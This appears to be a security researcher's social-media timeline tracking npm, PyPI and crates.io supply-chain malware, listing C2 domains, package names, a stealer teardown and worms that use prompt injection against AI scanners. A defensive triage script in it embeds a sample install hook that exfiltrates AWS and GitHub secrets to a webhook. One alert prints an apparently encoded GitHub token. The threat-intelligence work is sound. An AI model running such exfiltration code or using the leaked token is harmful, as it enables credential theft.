Kirk retweeted
A few npm packages seem to be loaders: they npm install socket io as a RAT, fetch a second stage (0001.dat) from the same C2, and run it. The C2 is associated with FAMOUS CHOLLIMA, the DPRK crew behind Contagious Interview. Expecting more. Packages below.
NPM Malware >
- Obfuscated postinstall hook (.prepare.cjs) uses char-code arrays to hide sensitive variable names
- Credential harvesting targeting AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN, NPM_TOKEN
- Exfiltration endpoint at open[.larksuite[.com (Feishu bot webhook) acts as C2
- Explicit sandbox evasion logic checking for SANDYCLAW, OPENCLAW, PERMISO, CHAINRADAR env
https[://www[.npmjs[.com/package/ash-claw/v/1.7.13
https[://sandyclaw[.permiso[.io/shared/5PVyO_QI-Y0ENhwni99JtULn_f8oVSMpqWXiYktq5E4
@TekDefense 😂
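A defender-side triage check for the install-hook indicators listed in the post above, added here as an example and not code from the post or the package: it decodes char-code arrays and then looks for the credential names, sandbox markers and exfil domain the post calls out. The helper names, thresholds and the sample hook are my assumptions.

```javascript
// Added example (not the post's code): heuristic triage of an npm install hook, keyed to the
// indicators listed above. Helper names, thresholds and the sample hook are assumptions.
const CRED_ENV = ["AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "GITHUB_TOKEN", "NPM_TOKEN"];
const SANDBOX_MARKERS = ["SANDYCLAW", "OPENCLAW", "PERMISO", "CHAINRADAR"];
const EXFIL_DOMAINS = ["larksuite.com"];

// Turn a list of char codes into text, or null if too short or not printable ASCII.
function codesToText(codes) {
  if (codes.length < 4 || codes.some((c) => c < 32 || c > 126)) return null;
  return String.fromCharCode(...codes);
}

// Recover strings hidden as numeric arrays: bare literals like [65,87,83,95] and direct
// String.fromCharCode(65, 87, 83, 95) calls. Non-numeric arguments are ignored.
function decodeCharCodeArrays(src) {
  const found = [];
  const patterns = [/String\.fromCharCode\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)/g, /\[\s*(\d+(?:\s*,\s*\d+){3,})\s*\]/g];
  for (const re of patterns) {
    for (const m of src.matchAll(re)) {
      const text = codesToText(m[1].split(",").map((s) => Number(s.trim())));
      if (text !== null) found.push(text);
    }
  }
  return found;
}

// Score one hook: decoded strings plus raw source are searched for the credential
// names, sandbox markers and exfil domain called out in the post.
function scanInstallHook(src) {
  const decoded = decodeCharCodeArrays(src);
  const haystack = src + "\n" + decoded.join("\n");
  const hits = (list) => list.filter((name) => haystack.includes(name));
  const report = {
    decodedStrings: decoded,
    credentialEnv: hits(CRED_ENV),
    sandboxMarkers: hits(SANDBOX_MARKERS),
    exfilDomains: hits(EXFIL_DOMAINS),
  };
  // Obfuscation alone is weak evidence; obfuscation plus secret reads or sandbox checks is the pattern.
  report.suspicious = decoded.length > 0 && (report.credentialEnv.length > 0 || report.sandboxMarkers.length > 0);
  return report;
}

// Constructed hook (not a real package): AWS_ACCESS_KEY_ID and SANDYCLAW hidden as char codes.
const SAMPLE_HOOK = `
const k = [65,87,83,95,65,67,67,69,83,83,95,75,69,89,95,73,68].map((c) => String.fromCharCode(c)).join("");
if (process.env[String.fromCharCode(83,65,78,68,89,67,76,65,87)]) process.exit(0);
fetch("https://open.larksuite.com/hook/placeholder", { method: "POST", body: JSON.stringify({ a: process.env[k], g: process.env.GITHUB_TOKEN }) });
`;
console.log(scanInstallHook(SAMPLE_HOOK));
```

Run it over the `postinstall`/`prepare` scripts of a package tarball before installing; a hit on both the obfuscation and the env checks is what warrants pulling the package into a sandbox.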
Github ransomware? Lapsus$ https[://www[.ransomware[.live/id/R0lUSFVCIElOVEVSTkFMQGxhcHN1cyQ=
Jun 12
Miasma > About to heat up? A bunch of the infected miasma repos that disappeared from github just popped back up. Last Friday about this time was the last wave.
https[://github[.com/betotk72/plutonian-charon-24342
https[://github[.com/codemo0nkey/funereal-hecate-6634
https[://github[.com/Ethan-iopasd/erebean-phlegethon-42318
https[://github[.com/samuelrizerio/sepulchral-thanatos-4253
https[://github[.com/victorighalo/stygian-phlegethon-18968
https[://github[.com/dmastag/infernal-acheron-28466
Jun 11
NPM Malware > DPRK Campaign > Steals yo wife, Steal yo kids (Secrets & SSH Persistence).
Infected Repos:
https[://www[.npmjs[.com/package/parket-slot
https[://www[.npmjs[.com/package/websocket-slot
These are a dependency of:
https[://www[.npmjs[.com/package/ts-ecro
https[://www[.npmjs[.com/package/ts-esys
Squatting legit repo: github[.com/MikeMcl/big.js
C2: https://[datasecure-service[.vercel[.app
This is a continuation of a campaign seen since April: panther.com/blog/tracking-an…
Thanks @500mk500 for context
Kirk retweeted
We have detected that the popular package `onering` on crates.io has been compromised with an information stealer that runs on build, which sends a git diff to a Sentry endpoint without authorization: github.com/cenotelie/onering… This is quite novel.
Interesting PoC
Word Based Shellcode Encoding New Medium post. Today, I’d like to share a technique that allows shellcode to be encoded as a sequence of English words. Similar to the classic shellcode to IPv4 encoding approach medium.com/@s12deff/word-bas…
// CI/CD sandbox detection (prefix-based, catches all SandyClaw/OpenClaw/Permiso variants) 🤷‍♂️ sandyclaw.permiso.io/shared/… (Malicious) https[://www[.npmjs[.com/package/visa-response/v/1.4.4-beta?activeTab=code
Kirk retweeted
🚨 Breaking: Miasma Malware Goes Open Source (Hades / Shai-Hulud Variants) TeamPCP's decision to open-source Shai-Hulud has spawned even more copycats, giving threat actors more tools to spread supply chain malware online. Thanks to @KirkDerpca for bringing this to our attention!
Kirk retweeted
🚨 Mini Shai-Hulud, Miasma, and Hades worms are now targeting Bioinformatics & AI devs! hiding JS stealers inside native Python extensions & .pth files, and even use prompt injection to blind AI security scanners. socket.dev/blog/mini-shai-hu…
Kirk retweeted
#threatreport #HighCompleteness AI-Powered Cheats & Stolen Secrets: Teardown of the Yuta/Solara Roblox Stealer | 04-06-2026
Source: derp.ca/research/yuta-solara…
Key details below ↓
💀Threats: Glove_stealer, Uac_bypass_technique, Dead_drop_technique, Silent_loader, Dll_injection_technique, Chromekatz_tool
🎯Victims: Roblox users, Game cheat users, Software developers, Cryptocurrency users
🏭Industry: Entertainment
📚TTPs: ⚔️Tactics: 4, 🛠️Technics: 10
🧨IOCs: Hash: 2, Url: 3, Path: 2, File: 26
💽Software: Roblox, Windows Defender, DeepSeek, Google Chrome, PyInstaller, Discord, Pastebin, Telegram, Chrome, Authy, ...
📲Wallets: metamask, exodus_wallet
🔢Algorithms: sha256, aes-cbc, aes-gcm, base64, zip, xor, aes
🔠Functions: _is_sandbox, Set-MpPreference, DPAPI
🗂️Win API: AmsiOpenSession, CoSetProxyBlanket, SeDebugPrivilege, NtCreateThreadEx, SetWindowsHookExW
📜Programming Languages: python, powershell
💻Platforms: intel
#threatreport: The Yuta/Solara campaign targets the Roblox platform with sophisticated evasion techniques and a multi-stage execution model. It begins with a seemingly legitimate .NET WPF application, which acts as an executor for Roblox cheats. This application is designed to deceive users while a secondary payload, created with PyInstaller, is executed silently in the background. This payload is a sophisticated implementation of the Glove Stealer malware family that employs various techniques to bypass security measures and exfiltrate sensitive user data. The malware features a complex orchestration process that includes establishing command-and-control (C2) communication through Discord, utilizing specific configuration points for payload delivery and data exfiltration. It is particularly adept at ensuring persistence on compromised systems, implementing a six-layer persistence strategy that includes scheduled tasks, registry modifications, and WMI event subscriptions, ensuring its survival across reboots.
To maintain operational stealth, the malware uses several techniques to blind Windows Defender, including prefixing commands to add exclusion paths and executing administrative invocations to trigger silent UAC prompts. This allows it to run undetected while executing a series of tasks to collect sensitive information. One notable method involves bypassing Chrome's App-Bound Encryption (ABE), using a five-tier approach inspired by previous malware versions and public research, facilitating access to decrypted user data such as cookies and tokens. Data exfiltration is carried out in memory without writing to disk, utilizing in-memory ZIP file creation. This avoids triggering common detection methods associated with file writes. The malware also implements a Discord bot for remote command execution, allowing threat actors to manage the infection and data theft actively. The campaign demonstrates advanced capabilities in memory manipulation, defense evasion, and data collection, specifically targeting high-value credentials and secrets related to gaming and development work. It is an illustration of the evolving tactics used by threat actors in the landscape of online gaming platforms, reflecting a shift towards more sophisticated and targeted cybercriminal approaches.
This is the new variant.
```
GitHub search monitor: new result
Watch: DontRevokeOrItGoesBoom commit search
Query: DontRevokeOrItGoesBoom
Search URL: github.com/search?q=DontRevo…
New results in this alert: 1
- felixEvora/erebean-hecate-42983@685a8f80c870
  DontRevokeOrItGoesBoom:Z2l0aHViX3BhdF8xMUFwZW9wNkRvWDJDNjJYUUZlRGt3X2FVcGhrSDZrN2RpRUZwaXJRK2NIYkRRTlpxMUsyYkxvMnROQUZHWmNtQnoxNDFyVzl6ajRkVmVIRzVoeUwvSmQxeWdBQUE
  2026-06-08T04:04:34.000 02:00
  github.com/felixEvora/erebea…
```
(2/3) This sample has shared lineage and expanded capabilities over the Azure:DurableTask sample we had previously deobfuscated.
Variant Differences
This variant adds JFrog and Artifactory credential handling, including JFrog token discovery, Artifactory npm repository validation, and an npm package compromise path for writable Artifactory npm repositories. It adds PyPI package compromise behavior, including PyPI token discovery, wheel mutation, .pth payload insertion, package version updates, RECORD rewriting, and upload through the PyPI legacy endpoint. It adds a PyPI OIDC path that requests a GitHub Actions ID token with a PyPI audience, exchanges it with PyPI for a package token, and uses that token for the PyPI wheel mutation and upload path. It expands repository persistence with GitHub GraphQL inspection of open pull requests and extends secret matching for PyPI tokens, JFrog domains, JFrog access tokens, and JFrog reference tokens. It expands local assistant and project configuration persistence to additional assistant settings and project rule files.
Shai-Hulud: Miasma
Today's PyPI attack is a devolved version of the DurableTask/Frogger variants. Missing from PyPI tree: Azure providers, GCP providers, password manager collection, RubyGems compromise, fine-grained GitHub PAT handling, GitHub Action release compromise, broad npm OIDC workflow compromise, PR/build-file/Dockerfile persistence, SSH known-host propagation, and sandbox/StepSecurity/Docker/sudo bypass logic.
Also has a C2 > https[://git-tanstack[.com:443/router
I know it's Saturday, we don't take breaks :P @inf0stache @MalwareUtkonos @AhmadNassri @geynis48380 @JFrogSecurity
NPM Malware > Seen this pattern before. "Security Research"
ng-search-api/v/99.9.1
motiondnb/v/99.9.1
iug24bqzzobt38fce7rxt4g8izoqmed22[.oastify.com
g1i0b9xx6mira6mal5yv02n6pxvouck09[.oastify.com
Sandbox:
sandyclaw.permiso.io/shared/…
sandyclaw.permiso.io/shared/…